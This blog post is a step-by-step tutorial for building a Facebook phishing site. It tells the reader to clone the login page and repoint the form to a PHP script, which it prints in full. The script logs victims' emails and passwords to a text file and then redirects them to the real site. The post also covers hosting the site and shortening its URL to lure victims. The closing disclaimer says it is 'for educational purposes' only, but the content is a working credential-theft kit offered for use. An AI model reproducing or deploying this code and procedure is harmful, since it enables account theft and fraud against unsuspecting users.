How to do a Phishing attack on Facebook?

This is a Step by step tutorial to make an undetectable Facebook phishing site.


Step 1: Download page source

Go to https://www.facebook.com

Right click on the blank area -> Click Save As



















When dialog box appears select ‘Webpage, complete’ as Save as type -> Click Save























Step 2: Edit “Facebook - Log In or Sign Up.html” file and rename it.

Open ‘Facebook - Log In or Sign Up.html’ file with notepad or Dreamweaver.

Remove all the ajax codes. (You can download HTML file which removed all ajax codes form here https://github.com/nimeshikaranasinghe/Facebook-Phisihing.git )

Search for login action (Press Ctrl + F -> type ‘action=’ -> Click Find Next)





















Replace the highlighted part (as in the following screenshot) with getDetails.php



Save the file as index.html




Step 3: Create getDetails.php

Open a notepad.
Type the following code

<?php
            $username = $_POST["email"];
            $passw = $_POST["pass"];
           
            $newfile = fopen("usercredentials.txt", "a") or die("File cannot be opened");
            $details = " Username = $username \n Password = $passw \n\n";
            fwrite($newfile, $details);
           
            //Redirect browser to original login page
            header("Location: https://www.facebook.com/login.php");
           
            fclose($newfile);
            exit();
?>

Save the file as getDetails.php




Step 4: Create a completely blank text file with name usercredentials.txt

This file is used to store user credentials.
Now you should have all the following three files with you:
  1. index.html
  2. getDetails.php
  3. usercredentials.txt













Step 5: Host your website

Now you need to upload these three files in a free web hosting site.
  • Here are some useful free hosting websites.
I recommended you to use www.000webhost.com . It is easy.
Create an account on www.000webhost.com and upload your three files. 
How to upload files to 000webhost.com?

Warning: If you didn’t remove the ajax codes properly your account will be suspended from the free hosting site.

Find your website URL.




















Now you are ready to share your website. If you can see the only difference is in your URL. The appearance is same as the original Facebook site.


















When someone try to login using your phishing site he/she will be redirected to the original Facebook site and username and password will be sent to the text file you created ‘usercredentials.txt’


Step 6: Shorten your URL

This step is alternative. You can use google URL shortener for this. 



















Step 7: View the user entered credentials.

Double click on the usercredentials.txt file which you have uploaded previously.

You can see usernames and passwords there.





This tutorial is only for educational purposes. I'm not responsible for any unlawful activities.  


If this article was helpful to you don't forget to put a like and share :)
If you have any questions comment here or email me. I'm here to help you. :)

Comments

Popular posts from this blog

Introduction to Encryption

Cross-Site Request Forgery protection in web applications via Double Submit Cookies Patterns